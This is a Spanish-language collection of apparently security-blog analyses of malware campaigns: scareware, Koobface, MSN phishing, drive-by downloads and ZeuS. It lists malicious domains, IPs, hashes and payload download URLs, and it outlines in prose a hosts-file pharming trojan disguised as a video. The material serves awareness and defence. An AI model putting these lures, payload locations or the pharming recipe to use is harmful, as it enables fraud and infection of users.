Se gestan estrategias y tácticas de combate virtual y hasta hipótesis de conflictos planeadas minuciosamente por analistas de inteligencia y otros personajes del ambiente secreto que se entretienen desde un escritorio diseñando los planes de acción que permitan implantar rumores, acciones de desvío y campañas de propaganda para encubrir cuestiones “beneficiosas” (en el sentido amplio de la palabra) sin llamar la atención de los demás; incluso, a través de malware.

Es entonces que una de las piezas mas importantes de la Cyber-Warfare es la Guerra de información ( Information Warfare ), o simplemente GI ; pero a través de medios informáticos y donde los soldados son personas con amplios conocimientos informáticos que no arriesgan sus vidas en el campo de batalla, sus armas son las computadoras y sus municiones son los bits.

Los servicios de inteligencia lo saben muy bien y siempre estuvieron involucrados en maniobras computacionales destinadas a “saber más de los otros” (personas, gobiernos, empresas…), recurriendo al espionaje informático por medio de acciones que involucran recursos tecnológicos como COMINT ( Communications Intelligence ) y otras no tanto como HUMINT ( Human Intelligence ) pero que guardan relación directa con Seguridad de la Información, entre otras actividades propias de la inteligencia militar.

Todas estas cuestiones las vimos directamente aplicadas en conflictos relevantes que se gestaron en los últimos años con casos como los de USA e Israel, Rusia y Estonia, entre otros donde el hacktivismo, el vandalismo informático, las campañas propagandistas y las estrategias de acción psicológicas inundan Internet con el solo hecho de debilitar al oponente.

La primera pregunta que quizás se crea en la mente es ¿por qué utilizar la tecnología de esta forma? Bueno... Sun Tzu lo aclaro de manera excelente cuando todavía no se hablaba de todo esto: “ El enemigo que actúa aisladamente, que carece de estrategia y que toma a la ligera a sus adversarios, inevitablemente acabará siendo derrotado ”. 150

- Campañas de propagación e infección - 151

Exploit Pack y su relación con el rogue Las actividades fraudulentas poseen relación entre sí a través de "asociados" de negocio en el cual cada uno de ellos oficia a modo de célula dentro de una misma estructura orgánica, complementando así una empresa dedicada a tales actividades ilícitas.

En este sentido, el rogue (también denominado scareware), cuenta con un volumen importante de "afiliados" que se encargan de la distribución de los códigos maliciosos. De hecho, un reciente estudio del FBI señaló que las perdidas estimativas a causa del rogue ascienden a USD 150 millones.

Esto demuestra por qué todas aquellas viejas estrategias de Ingeniería Social que muchas veces dejan una sensación de trivialidad aún hoy son muy efectivas; y por qué muchos profesionales del ámbito criminal, que buscan ampliar las actividades delictivas y sus ganancias, migran sus esfuerzos en combinar las estrategias de diseminación con técnicas del tipo BlackHat SEO e incluso, con Exploits Pack como en este caso.

Un caso concreto es el Exploit Pack de reciente aparición denominado Siberia Exploit Pack que dentro de su estructura incorpora un archivo llamado file.exe. Cuando el usuario accede a uno de los dominios utilizados por el crimeware , un exploit (generalmente a través de archivos pdf) se encarga de explotar determinada vulnerabilidad, descargar un malware desde un dominio preestablecido y ejecutarlo.

Una vez que el malware infecta el sistema, realiza un Desktop Hijack mostrando la advertencia de una infección a través del mensaje "YOUR SYSTEM IS INFECTED! ".

Luego de ello, el sistema comienza a desplegar ventanas emergentes (característica propia del adware) convirtiendo el sistema en el nido del rogue y punto de referencia de una botnet . Sin embargo, independientemente de la infección, esas ventanas emergentes forman parte de la campaña de engaño y de acción psicológica del malware.

Por un lado, porque el supuesto antivirus instalado lejos de solucionar los problemas, los empeora descargando más códigos maliciosos o abriendo los puertos para que accedan otras amenazas. Por otro lado, porque las advertencias de infección, además de ser agresivas, son completamente falsas, y el objetivo es "asustar" al usuario para que termine "comprando" el falso antivirus. 152

Testimonios sobre scareware y estrategia de credibilidad Una de las estrategias utilizadas por los propagadores de scareware ( rogue ) es intentar atraer la confianza de los usuarios a través de "testimonios" supuestamente realizados por personas que ya habrían adquirido la "solución" y que por intermedio de estos manifiestan su "gran satisfacción por el mismo".

Sin embargo, sabemos muy bien que sólo es parte de un engaño que busca complementar la estrategia general de propagación/infección, y que si instalamos ese programa vamos a terminar con el sistema infectado por un scareware . En consecuencia, ¿no se preguntan quienes son los que afirman la eficacia de esta falsa herramienta antivirus?

En función de la imagen, donde debajo de cada frase aparece el supuesto nombre (incompleto) del responsable de la misma, quizás podamos deducir que se trata de las señoras y señores:

• Dave C. = Dave Conficker • Beth P. = Beth Phoenix • Lisa W. = Lisa Waledac • Melissa H. = Melissa Hupigon • Paul M. = Paul Mebroot • Jason C. = Jason Crum • Pat J. = Pat Justexploit • Matt E. = Matt Eleonore • Roger F. = Roger Fragus • Sam P. = Sam Piosonivy • Jamie V. = Jaime Virut • Tracey K. = Tracey Koobface • Brian A. = Brian Adrenaline • Sally V. = Sally Virtumonde • John R. = John Ransomware • Lauren R. = Lauren Rustock

El malware siempre tomando "personalidades" como estrategia y cobertura donde sólo ellos podrían hablar maravillas de un colega fraudulento ;-P 153

Anti-Virus Live 2010. Chateando con el enemigo Generalmente se tiene la falsa creencia de que los códigos maliciosos constituyen problemas triviales que cualquier técnico soluciona con solo formatear el sistema o adquirir alguno de los reconocidos antimalware que ofrece el mercado antivirus de la actualidad.

Sin embargo, por un lado, la realidad es que detrás del desarrollo de malware se esconde un negocio grandísimo en el cual día a día se suman más "asociados". Por otro lado, qué pasa cuando ese antivirus que planeamos comprar es todo lo contrario.

Este es el caso del Anti-Virus Live 2010 o lo que es lo mismo, Anti-Virus Elite 2010, un malware del tipo scareware (o rogue), que deja en completa evidencia que los procesos y mecanismos mediante los cuales se engaña a los usuarios para robarles dinero se encuentran bien aceitados y muy bien pensados.

En primera instancia, como es habitual en este tipo de amenazas, la estrategia se encuentra apoyada por una página web que es utilizada de "carnada" para atraer a las potenciales víctimas, argumentando todo tipo de justificaciones para "demostrar" cierta credibilidad en el falso antivirus, lo que complementa una típica campaña de desinformación.

Hasta el momento, nada interesante. Salvo, por la posibilidad de solicitar asistencia vía chat. Interesante. Comprobemos entonces si este condimento es legítimo… Sí, lo es.

En consecuencia, se estableció la comunicación a través de esta opción con la sorpresa de que inmediatamente obtuvimos respuesta del otro lado. 154

A continuación se puede aprovechar la corta conversación vía chat.

Básicamente nos comentó Dennis, el negociante, que entre otras cosas el supuesto antivirus es compatible con todas las versiones de Windows, que su valor es de USD 27 , que sólo soporta el idioma inglés y no existe versión para empresas y que elimina conficker sin problemas.

Analicemos brevemente estos puntos. Evidentemente, el scareware debe ser compatible con todas las versiones de Windows ya que es ese puntualmente el público al cual está orientada la amenaza. ¿Por qué? Sencillamente porque más del 80% de las personas consumen Windows como principal sistema operativo en entornos hogareños, donde la potencialidad de encontrar una víctima concreta se incrementa. De esa manera es mucho más factible "cerrar negocio".

Por esa misma razón no existe versión para GNU/Linux, incluso, ni siquiera versión orientada a empresas; ya que generalmente, las compañías cuentan con un mayor nivel de seguridad donde, probablemente, el scareware no encuentre resultados positivos.

¿Por qué inglés y no Ruso? Porque el inglés es el tercer idioma más utilizado. Su costo, USD 27 , representa un valor competitivo que se encuentra acorde al costo promedio de los programas antivirus legítimos. Y con respecto a conficker, si preguntábamos por koobface, la respuesta hubiera sido la misma.

Una dato más que interesante y que ayuda a comprender en su justa medida la magnitud del negocio clandestino de malware, es el error cometido por el "afiliado" Dennis al momento de solicitarle la dirección para comprar la falsa solución. 155

Nos ofrece la url registryfix.com/purchase y al momento de comentar que no se trata de la supuesta solución en cuestión, hace la salvedad ofreciendo la url correspondiente antivirus- elite.com/purchase .

Sin embargo, nosotros estábamos tratando de cerrar "negocio" por Anti-Virus Live 2010 y no por Anti-Virus Elite 2010 , dejando en evidencia que se trata de la misma amenaza bajo nombres diferentes. Incluso, que el mismo "asociado" maneja y comercializa diferentes alternativas bajo modalidad similares. En este caso, ofreciendo también la venta fraudulenta de Registry Fix , otro scareware asociado a NoAdware y ErrorClean .

Desde un punto de vista más técnico, el dominio de esta amenaza se encuentra en la dirección IP 204.232.131.12 , alojado en la ISP Rackspace, ubicada en la ciudad de Hoboken en Estados Unidos bajo el AS27357 .

Según el historial de este AS, las actividades generadas por códigos maliciosos son importantes

Desde el sitio web se descarga un ejecutable llamado setup.exe (MD5: C50DC619E13345DEC2444B0DE371DFD4) que corresponde al instalador de scareware con un bajo índice de detección.

Como podemos apreciar, los delincuentes informáticos no se cansan de propagar amenazas cada vez más agresivas que acompañan el proceso de infección a través de campañas de marketing, incluso, muy similares a las utilizadas por muchas compañías antivirus.

Campaña de propagación de Koobface a través de Blogspot Una masiva campaña de propagación del gusano koobface se encuentra In-the-Wild utilizando como estrategia blogs generados desde el servicio Blogspot .

Koobface se ha transformado en una pesadilla para las redes sociales y si bien sus estrategias de propagación no cambian, este malware lleva casi dos años de actividad con una importante tasa de infección, constituyendo una de las botnets más importantes de la actualidad.

Los dominios de blogspot empleados como cobertura para la propagación son: pannullonumair.blogspot.com haladynalatosha.blogspot.com macdougalmuskan.blogspot.com mailletjamaica.blogspot.com ledrewrooney.blogspot.com brasenoktayoktay.blogspot.com toludestany.blogspot.com edgarbillison.blogspot.com piotrowiczlyanne.blogspot.com brochoiredeedee.blogspot.com decuyperantohny.blogspot.com derrenpassini.blogspot.com elsenelsenumthun.blogspot.com elsyelsysalah.blogspot.com fanjonappuappu.blogspot.com fredrikadantos.blogspot.com genelleabril.blogspot.com gilkerharjyot.blogspot.com hadzilashawn.blogspot.com insalacotecwyn.blogspot.com janitasaels.blogspot.com jodelinscheufler.blogspot.com jones-allentammey.blogspot.com jurgisbooty.blogspot.com karanjeetisoardi.blogspot.com dralleboyeboye.blogspot.com maidenhermann.blogspot.com bustamantetimpriss.blogspot.com murachaniananou.blogspot.com nevnevsculthorpe.blogspot.com 156 parrisvistisen.blogspot.com porierkunlekunle.blogspot.com rotermundraimon.blogspot.com sharonyacorvil.blogspot.com sodorabardan.blogspot.com tendaiblunk.blogspot.com turskeybrianna.blogspot.com zhuochengbate.blogspot.com ziziziziboyter.blogspot.com

Quien accede a alguno de estos dominios es redireccionado a una página que simula la típica pantalla de YouTube. A continuación vemos una captura.

Inmediatamente después, se intenta descargar un binario llamado "setup.exe" (md5 6d8ac41c64137c91939cced16cb5f2fe) que posee una tasa de detección media baja.

Este binario, a su vez se encarga de descargar y ejecutar otros códigos maliciosos.

• v2prx.exe ( 36/41 - 87.80%) • go.exe ( 7/41 - 17.07%) • fb.75.exe ( 22/41 - 53.66%) • v2newblogger.exe ( 36/41 - 87.80%) • v2captcha.exe ( 39/41 - 95.12%) • v2googlecheck.exe ( 40/41 - 97.56%)

Cada uno de estos archivos son descargados desde dominios del estilo "homemadesandwiches.com/.sys/?getexe=ff2ie.exe ". 157

El binario v2captcha.exe se encarga de romper el captcha que solicita blogspot para el registro de blogs, creando de manera aleatoria y masiva los mismos, y redireccionando luego a la descarga de koobface a través de, como lo mencioné en un principio, una falsa página de YouTube que utiliza la misma estrategia de ingeniería social visual utilizada en otras campañas de propagación similares.

Sin lugar a dudas koobface es otro de los códigos maliciosos que se vale de la persistencia a pesar de que muchas de sus variantes son detectadas por la mayoría de las compañías antivirus.

Campaña de phishing orientada a usuarios de MSN Desde que comenzaron a popularizarse las páginas web que prometen proveer información sobre los contactos bloqueados en el cliente de mensajería instantánea de Microsoft, las campañas destinadas al robo de información privada de los usuarios, siguen en constante insistencia.

Lo cierto es que quienes confían en este tipo de engaños, son víctimas ni más ni nada menos que de una simple maniobra de Ingeniería Social que en muchos casos, goza de una efectividad relativamente difícil de aceptar, y destinada a realizar ataques de phishing .

Esta situación deja en completa evidencia los niveles de (in)madurez que todavía existe en materia de prevención y la necesidad de crear conciencia sobre el verdadero alcance e implicancias en seguridad de los conceptos de confidencialidad y privacidad.

En este sentido, una nueva campaña de phishing busca captar la atención de los usuarios que hacen uso del popular cliente de mensajería instantánea de Microsoft, MSN.

Es decir, casi el 90% de las personas.

Detrás de una cobertura bajo el slogan " Verify who blocked you on their msn contact list ", se esconde una campaña que estratégicamente y con paciencia va obteniendo nombres de usuario y sus respectivas contraseñas de todos aquellos interesados en saber quienes de sus contactos los han bloqueado… Sigo sin comprenderlo… :(

Desde el punto de vista técnico, bajo la dirección IP 121.54.174.85 (Hong Kong Hong Kong Sun Network Limited) se alojan una importante cantidad de dominios que redireccionan a la misma página fraudulenta. Estos dominios son: 158

ahem-they-blocked-me.com cindrella-blocked-me.com damnn-they-blocked-me.com did-they-block-you.com face-blocked-truth.com find-reason-of-being-blocked.com finding-who-blocks.com friends-block-buddies.com grab-block-status.com grab-my-block-status.com have-they-blocked-you.com heroes-never-block.com how-come-they-block-me.com im-fedup-of-being-blocked.com im-sad-im-blocked.com ima-checking-block-status.com jesus-he-blocked-us.com kephsa.why-do-they-block.com lame-friends-block-you.com leme-check-block-status.com mean-friends-block.com mjzfx0.why-do-they-block.com notice-they-blocked-u.com oh-i-was-blocked.com omg-they-blocked-me.com phew-they-blocked-me.com phewww-seems-i-am-blocked.com puff-im-blocked.com pwdgds.grab-my-block-status.com sad-i-was-blocked.com see-they-blocked-me.com tchv9l.find-reason-of-being-blocked.com they-were-haha.com ufff-i-was-blocked.com urr-he-blocked-us.com weird-i-was-blocked.com who-let-me-block.com why-do-they-block.com why-my-friends-block.com wooh-im-blocked.com

Es sumamente importante tomar las medidas de precaución y prevención necesarias para no ser víctimas de este tipo de técnicas, extremadamente sencillas de llevar a cabo y extremadamente efectiva para quienes no están al tanto de ellas.

En este caso, no se trata de implementar una solución de seguridad a toda marcha sino de sentido común. De acceder la información sólo en la página web legítima y verificar la existencia de las medidas de seguridad que garantizan el cifrado de la información.

Sobre todo, para no preguntarnos luego cómo hacen para obtener gran cantidad de información sobre credenciales de autenticación de diferentes servicios de web y publicarlos en Internet sin restricción alguna :-)

Pornografía. Excusa perfecta para la propagación de malware II Una de las temáticas más explotadas para la diseminación de códigos maliciosos es la pornografía. Evidentemente todo lo relacionado a lo porno despierta cierta característica, propia de todo ser humano, que responde a un concepto tan antiguo como la vida misma: la lujuria. 159

Asimismo, esta característica se engloba dentro de los llamados "pecados capitales" y representa un punto débil para los usuarios que buscan en Internet este tipo de material sin atender buenas prácticas de prevención; y cuando la excusa utilizada para ejecutar la acción de Ingeniería Social es la pornografía, la propagación de malware provoca un alza en el índice de infección de la amenaza.

En este caso, nos encontramos con un sitio web que simula respetar las normas que indican dejar en evidencia que el contenido del mismo posee material explícito sólo para mayores de edad; sin embargo y como es de esperar, marca el inicio de la estrategia de engaño.

En cualquiera de los botones en los que hagamos clic ( enter site! o exit now! respectivamente) el efecto es el mismo,…

…se redirecciona a una página que despliega imágenes impúdicas que al seleccionar cualquiera de ellas, redirecciona nuevamente a otra que completa el ciclo de engaño.

Utilizando la típica maniobra de Ingeniería Social visual, pretende engañar al usuario con una imagen que especifica la necesidad de descargar la aplicación Flash Player 10.

A los pocos segundos ofrece la descarga de un archivo llamado "adobeflashplayerv10.0.32.18.exe" (5f49907a0e20b4ddebc6c31bde9eb6f1), que es el malware con el nombre "mimetizado”.

160

Este código malicioso posee una tasa de detección baja ( 10/41 - 24.39%). Esto significa que puede tener un índice muy alto de infección en un rango de tiempo muy corto.

Entre otras acciones comunes del malware (manipular claves del registro, crear archivos, monitorear proxy), establece una conexión con la dirección IP 212.117.169.163 desde la cual descarga otro binario.

En este caso, llamado "setup.exe" (839e68b258ca56a5693a47bd610415f5) que al igual que el anterior también es detectado por un número bajo de antivirus ( 11/39 - 28.21%).

Como podemos deducir, las maniobras que relacionan al malware con la pornografía son muy activas, y constituyen uno de los vectores más empleados para las actividades de engaño y diseminación de todo tipo de códigos maliciosos.

Rompiendo el esquema convencional de infección Luego de varios años de estar en el ámbito de seguridad de la información, y en particular seguridad antivirus, uno tiene la suerte de escuchar comentarios que intentando justificar lo injustificable se asemejan más a mitos que a verdades.

Hace poco tiempo un periodista nos preguntaba cuál es nuestra sensación frente a usuarios medianamente avanzados que aseguran no necesitar software de seguridad antivirus porque saben lo que realmente tienen en su equipo.

Si bien esto puede ser cierto, creo que no debemos pecar de arrogantes. ¿Qué quiero decir con esto? Muchas veces confiamos en saber lo que hacemos y luego nos encontramos con que aquello que parecía trivial resulto ser muy peligroso. Obviamente el caso utópico seria el de un usuario conciente de los peligros que existen en la nube (esta palabra tan de moda para referirse a Internet) y obre en consecuencia a través de mecanismos de prevención.

Sin embargo, muchas veces, esos aspectos triviales nos llevan a crear en nuestra mente una falsa sensación de seguridad, creyendo que la tenemos cuando en realidad no. Trasladado este aspecto al mundo del malware, es más habitual de lo que se cree.

Repasemos en primera instancia la estructura de un código malicioso convencional. Podríamos decir que se encuentra, básicamente, compuesto de tres módulos: de daño, de auto-defensa y de comunicación.

El módulo de daño, está diseñado para ejecutar las instrucciones dañinas como la eliminación de información, el cifrado de archivos, el envío de spam, de mensajes a los contactos del MSN, de ejecutar ataques DDoS, keylogging, entre muchas cosas más.

161

El módulo de auto-defensa se encargará de controlar aquellos aspectos que atenten contra sus instrucciones maliciosas, por ejemplo, desactivando los programas de seguridad (firewall, antivirus); bloqueando el acceso a funcionalidades nativas del sistema operativo (registro, CMD, Administrador de tareas), incluso bloqueando también el acceso a las páginas web de los antivirus para evitar su actualización. En este módulo también se incluyen técnicas más avanzadas como rootkit, detección de máquinas virtuales, anti-debugging, entre otros.

En cuanto al módulo de comunicación, que no necesariamente tiene que estar presente pero que es característico del malware actual, se encargará de establecer una comunicación contra un servidor malicioso (que puede ser una zombi) para descargar otros códigos maliciosos, actualizar su propio código, continuar con su ciclo de propagación, manipular la conexión de red (DNS, SMTP, proxys HTTP), cifrar la información robada, y más dependiendo del tipo de malware.

Todas estas actividades permiten evidenciar la presencia de malware en el equipo, y de ellas se aferran las soluciones antivirus durante el proceso de detección. Sin embargo… ¿qué pasa cuando este esquema se rompe? Esto sucede en el siguiente ejemplo:

Tenemos un archivo que se propaga a través de correo electrónico simulando ser un video, su nombre es videotestimonio.mpeg.exe (Ingeniería Social aplicada al archivo). El usuario ejecuta ese archivo e inmediatamente se ejecuta una instancia del navegador que muestra un video alojado en YouTube que hace referencia a lo que alude el nombre del archivo.

Es decir, no quedan procesos residentes en memoria, no se manipula ninguna clave del registro, la PC no presenta síntomas extraños y el usuario visualizó lo que se le prometió. Sin embargo, en segundo plano pasó algo.

El código malicioso agregó información en el archivo host llevando a cabo un ataque de pharming local, destinado a realizar ataques de phishing contra la víctima. En este caso, el malware no posee módulos de comunicación, ni de auto-defensa, sólo un módulo de ataque que lo único que hace es agregar información en el host; rompiendo así el esquema convencional de infección. En base a esto… ¿la máquina está infectada? Sí ¿el antivirus lo detectará? Lo más probable es que no porque el archivo host no es un malware.

En cuanto al desarrollo del código malicioso, también es trivial. Simplemente se compone de un archivo .bat (video.bat) que posee las instrucciones necesarias para agregar información en el archivo host, comprimido con WinRAR generando un archivo SFX (videotestimonio.mpeg.exe) con dos líneas de código que ejecutan el archivo .bat. 162

Independientemente de lo trivial del malware. Los efectos que se pueden lograr a través de esta técnica son muy peligrosos. Además, la tasa de detección es muy baja. Sólo el 12/41 (29.27%).

Evidentemente, la confianza no es tan saludable, sobre todo en un ambiente tan ambiguo como lo es Internet.

Propagación automática de códigos maliciosos vía http Muy bien sabemos que los procesos por automatizar la propagación de malware es uno de los objetivos básicos de cualquier ciberdelincuente, independientemente de los vectores de ataque y tecnologías que se empleen.

En este sentido, Internet se ha transformado en la cuna que mece diferentes alternativas de piezas maliciosas a través de alternativas de ataque que día a día evolucionan. Hace varios años atrás era bastante difícil suponer que con el solo hecho de acceder a una página se corre el peligro de infección si se cumplen determinados requisitos en el sistema, requisitos que tienen que ver básicamente con las actualizaciones del sistema operativo y aplicaciones.

Hoy, nos encontramos con script’s cuyas instrucciones son creadas maliciosamente y forman parte de un ciclo de propagación e infección, lamentablemente, muy efectivo. Un ejemplo concreto, no solo de evolución sino también de efectividad, lo constituye la técnica Drive-by- Download junto a su versión evolucionada de ataques Multi-Stage ; altamente empleada por botmasters para propagar amenazas.

El siguiente, es un escenario real que ejemplifica con mayor claridad lo que acabo de contar. Se trata de una página web alojada en Estados Unidos bajo la IP 66.116.197.186 en AS32392 .

163

A continuación se observa una captura de la web.

Los dominios alojados en esa misma IP son:

• phonester.biz • phonester.com • phonester.info • phonester.net • phonester.org

Cuando se accede desde Windows, a través de un script embebido en el código HTML, se ejecuta automáticamente una ventana proponiendo la descarga de Flash Player. Obviamente, es falso. El archivo que se propaga se llama “install_flash_player.exe” (abed2d16e5e4c3e369114d01dff4b19c) y posee un índice de detección bajo, ya que solo casi el 25% de los motores antivirus detecta el malware que se encuentra In-the-Wild.

Este procesamiento automático se lleva a cabo, como dije anteriormente, a través de un script, cuya captura se observa a continuación. 164

La cuestión con esto es, probablemente, que cuando el usuario acceda no se lleve ningún indicio sobre contenidos maliciosos, de hecho la página no contiene enlaces, sólo una imagen.

Sin embargo, de forma transparente se ejecuta el script que incita a la descarga del falso Flash Player. Ahora… el tema no termina aquí. Desde un punto de vista más técnico, hay muchos detalles que son difíciles de no captar.

En principio, al desofuscar el script, obtenemos una serie de datos relevantes. El script posee etiquetas iframe que direccionan a una serie de páginas web desde donde se descargan otros archivos maliciosos.

• diggstatistics.com/flash/pdf.php • diggstatistics.com/flash/directshow.php • diggstatistics.com/flash/exe.php

Los archivos que descarga son “ tylda.exe ” (abed2d16e5e4c3e369114d01dff4b19c) que tiene una baja tasa de detección (5/41-12.20%) y “ pdf.pdf ” (9cc400edcdc5492482f5599d43b76c0c) con una tasa de detección también baja (13/41-31.71%) y diseñado para explotar vulnerabilidades en Adobe reader y acrobat. Adobe util.printf overflow (CVE-2008-2992) y Adobe getIcon (CVE-2009-0927) respectivamente.

Por otro lado, en el hipotético caso de que el archivo que se descarga en primera instancia (install_flash_player.exe ) sea ejecutado, este establecerá conexión contra 174.120.61.126/~garynic/ desde donde descargará el binario “coin.exe” (258c0083f051b88ea36d3210eca18dd7) con un índice de detección también bastante pobre. Este archivo se descarga de forma aleatoria desde:

• digital-plr.com • giggstatistics.com • xebrasearch.com

Con respecto al ASN en el cual se encuentran estas amenazas, pose un historial delictivo interesante, ya que es empleado para llevar a cabo actividades de phishing como propagación de malware. 165

Según la siguiente imagen, el pico más alto de actividades de phishing se produjo el 1 de marzo de 2009, mientras que las de códigos maliciosos fue el 12 de septiembre de 2009.

Es decir, estas actividades se explotan en conjunto, no de manera aislada. Esta información no da la pauta de suponer que detrás de todas estas actividades delictivas se esconde la codicia de algún botmaster, ya que las acciones son típicas de una botnet .

Eficacia de los antivirus frente a ZeuS Luego de la liberación del código de ZeuS durante el 2007, sin lugar a dudas, además de ser una de las botnets más grandes, su troyano se ha convertido en uno de los que posee un mayor índice de infección a nivel global.

En este mismo blog hemos abordado algunas características de esta botnet, que con más de 20 versiones desde su aparición, últimamente ha tomado mayor relevancia en los medios de información especializados gracias a una serie de informes que describen algunos de sus aspectos más relevantes.

Por ejemplo RSA, hace poco tiempo publicó un informe sobre fraudes en línea describiendo la incorporación de un componente Jabber que de forma instantánea alerta a los botmasters cuando se ha reclutado una nueva zombi. S21Sec recientemente realizó un seminario en línea sobre la evolución de ZeuS en el que describieron sus patrones más relevantes entre otros detalles técnicos.

Se suma a esta ola la empresa Trusteer, que según un corto pero interesante informe liberado recientemente, presenta a ZeuS desde una perspectiva diferente. Bajo el título " Measuring the in-the-wild effectiveness of Antivirus against Zeus" deja en evidencia la eficacia de las soluciones de seguridad antivirus frente al código malicioso que propaga esta botnet en particular.

Hay algunos datos interesantes que se desprenden del informe. Según el mismo, actualmente ZeuS posee bajo su mando aproximadamente 3,6 millones de computadoras sólo en USA y a nivel global el 44% de las zombis que forman parte de botnets; lo cual deja bien claro que actualmente es la red de zombis más grande.

En este sentido, la respuesta que podría dar fundamento fuerte a estos datos quizás se deba a la popularidad que ha tenido ZeuS en el ambiente clandestino de comercialización del mercado ruso gracias a su bajo costo, del crimeware en general, y a la liberación de sus primeras versiones en diferentes foros desde los cuales es posible conseguirlos de forma gratuita.

De hecho, de las dos generaciones de ZeuS (versión 1 y 2) un alto porcentaje de botnets In- the-Wild pertenecen a la primera generación con un amplio repertorio de versiones que van desde la 1.0.x.x a la 1.1.x.x.

166

Actualmente, ZeuS se encuentra por su versión pública 1.2.5 aunque existen versiones privadas con algunas modificaciones (mejoras para los botmasters) que por el momento no se consiguen en la clandestinidad under pero que se encuentran In-the-Wild como el caso de la versión 1.2.7.

Sin embargo, lo más importante de este informe, como lo mencioné líneas arriba, se canaliza en la eficacia de los antivirus en cuanto al índice de detección que presentan de su troyano.

Si bien los datos reportados por Trusteer son muy interesantes hay una serie de cuestiones que se deben tener en cuenta. Una de ellas y que cabe aclarar es que ZeuS posee una aplicación interna mediante la cual se genera el binario a propagar y el archivo de configuración desde el que toma la información fraudulenta para los ataques de phishing y demás. Pero además, permite ejecutar otros ataques a través de exploits diseñados para aprovechar vulnerabilidades de las aplicaciones de flash y lectores PDF mediante archivos .pdf y .swf.

Por otra parte, la muestra tomada para el análisis fue de 10.000 zombis, que si bien no refleja un dato real de equipos infectados con ZeuS permite obtener información precisa y una idea lo suficientemente concreta sobre el riego de seguridad que representa el malware.

Lo más preocupante, según el informe, los datos de infección recogidos se encuentran basados en tres factores que involucran directamente a los antivirus y de los cuales se desprenden los siguientes niveles de eficacia:

• Computadoras sin antivirus: el 31% infectados con ZeuS • Computadoras con antivirus desactualizado: el 14% infectados con ZeuS • Computadoras con antivirus actualizado: el 55% infectados con ZeuS

Esto significa que la eficacia de los programas antivirus es baja, porque el índice de detección de ZeuS es bajo. ZeuS es un código malicioso complejo que desde el principio incorpora un módulo de cifrado y esto hay que tener en cuenta.

Cada distribución de su binario significa una nueva variante que amplia nuevamente el tiempo de respuesta de los AV incorporando nuevas víctimas e incrementando su familia. Más complejo aún, si tenemos en cuenta que el binario puede ser (y lo es) sometido a procesos anti-análisis que se ofrecen a granel en Internet.

Green IT utilizado para la propagación de scareware Hace un tiempo escuchaba una charla muy interesante en un evento de tecnología muy importante en Centro América, en donde se mostraban ciertos aspectos tecnológicos que, de utilizarlos con un mayor nivel de eficiencia, ayudan a disminuir el impacto que estos provocan sobre el sistema ambiental. Esto se conoce bajo la nomenclatura de Green IT , cuya traducción al español es Tecnologías verdes o computación verde.

167

Se trata básicamente de un concepto que busca definir un nivel de eficacia y eficiencia energética adecuada buscando un equilibrio que permita minimizar el impacto negativo que hasta el momento provocan los recursos tecnológicos sobre el medio ambiente.

La cuestión es que ciertos scareware ( rogue ) se han hecho eco de este concepto para lograr la atención de quienes nos encontramos interesados en la problemática generada por los recursos tecnológicos sobre el medio ambiental, utilizando, como es habitual en este tipo de malware, las clásicas maniobras de engaño que las caracterizan y que buscan una " inversión" por parte de los usuarios desprevenidos.

Se trata de la propagación de los scareware conocidos como Green Antivirus y Ecology Green PC .

En el caso de Green AV , y en razón del concepto que representa la computación verde, una de las estrategias de engaño que utiliza se basa en la promesa de "donar" USD 2 por cada venta para colaborar en la "salvación" de los árboles de la selva Amazónica, la selva tropical más grande del planeta.

Pero también los propagadores de esta amenaza, poseen un fuerte argumento que relaciona la protección del medio ambiente con el daño provocado por códigos maliciosos.

Bajo la frase " We thought that our application can guard not only your PC, but whole Earth - our home planet .", algo así como que el producto ofrecido (GreenAV) no solo protege el equipo de malware sino también ayuda a proteger el planeta; la estrategia maliciosa canaliza su argumento en que las consecuencias provocadas por diferentes códigos maliciosos (sobrecarga en el consumo de recursos) repercute en un mayor consumo energético por parte de la PC, aumentando los residuos no reciclables y desprendiendo así desechos tóxicos que perjudican el medio ambiental.

Apoyando también este argumento en noticias reales como http://www.ecogeek.org/content/view/788/74/ y http://news.cnet.com/8301-11128_3-10007998-54.html .

Más allá de lo verdadero del argumento, se trata de una estrategia que fundamenta de forma coherente la relación entre el malware y el medio ambiente para atraer más usuario e incitarlos a la compra de esa "buena solución de seguridad".

En la zona de pre-venta del sitio web, la estrategia fraudulenta se apoya aún más sobre la supuesta contribución que hasta el momento se ha concretado, mostrando el valor donado. 168

En nuestro ejemplo la suma es de USD 23.965, 5005 sobre un valor real del malware "solución de seguridad antivirus ecológica" de casi USD 100 , cuando un programa antivirus legítimo y con reputación posee un valor que ronda los USD 50 .

Otro aspecto llamativo es el medio de pago que se emplea. Hace unos años, se utilizaba el mismo método pero con páginas clonadas de los servicios que permiten realizar pagos en línea, donde una de las recomendaciones más fuertes era verificar que la información depositada viaje segura ( https ).

Ahora, esto se realiza directamente empleando recursos válidos y legítimos, donde la información fluye de forma cifrada (lo podemos observar en la siguiente imagen). En este caso, utilizando el servicio que ofrece la compañía estadounidense Plimus , a través de un formulario que automáticamente realiza la conversión de la moneda en función del país desde el cual se acceda a la página.

169

Estas cuestiones a nivel estratégico planteadas para la propagación, en este caso, de scareware marca el nivel de profesionalismo y esfuerzo que depositan constantemente los desarrolladores maliciosos y demás personajes de este ambiente clandestino, como los spammers y botmasters, que se valen de maniobras similares de propagación a través, incluso, de botnets.

Es evidente también que cualquier noticia/novedad/tecnología olo que sea, es empleada de forma maliciosa enmascarada como benigna tras estrategias de Ingeniería Social.

Green IT utilizado para la propagación de scareware II Anteriormente habíamos visto la utilización como estrategia de engaño y “ recurso de atracción ”, ciertos aspectos relativos a la llamada computación verde ( Green IT ), empleando fundamentos de venta fuertes para relacionar la problemática que plantea Green IT con los códigos maliciosos desde una perspectiva un tanto analítica.

Sin embargo, existen aspectos técnicos que podemos relacionar y cuyos datos procesar de forma sencilla para entender, con mayor nivel de profundidad, el modo de operación de los ciberdelincuentes que se encuentran detrás de estas amenazas y el uso, o abuso, de diferentes técnicas.

Continuando con el ejemplo del anterior post que habla sobre el scareware Green IT , por el momento se desprende que los dominios utilizados para propagar la amenaza se encuentran alojados bajo la dirección IP 174.142.96.2 . Estos dominios son:

• avsolutiondwn .info • green-av-pre .com • green-av-pro .com • my-green-av-pro .com • my-green-av .com • ntrytodownload .info • progresivescan .info • zp4.green-av .com

El hosting se encuentra ubicado en Canada . Precisamente en Montreal, en la compañía Iweb Technologies Inc que ofrece servicios de alojamiento web a bajo costo.

